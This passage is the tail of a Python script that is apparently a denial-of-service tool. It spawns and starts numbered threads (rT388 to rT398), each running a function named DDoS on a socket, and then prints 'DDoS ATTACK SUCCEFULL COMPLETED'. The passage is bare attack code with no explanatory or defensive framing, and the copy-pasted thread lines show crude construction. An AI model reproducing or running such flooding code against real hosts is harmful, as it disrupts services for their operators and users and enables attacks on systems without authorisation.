rT388= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT388.start()
rT389= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT389.start()
rT390= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT390.start()
rT391= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT391.start()
rT392= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT392.start()
rT393= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT393.start()
rT394= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT394.start()
rT395= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT395.start()
rT396= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT396.start()
rT397= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT397.start()
rT398= threading.Thread(target = DDoS, args = ("RecvThread",s))
rT398.start()

print('DDoS ATTACK SUCCEFULL COMPLETED')
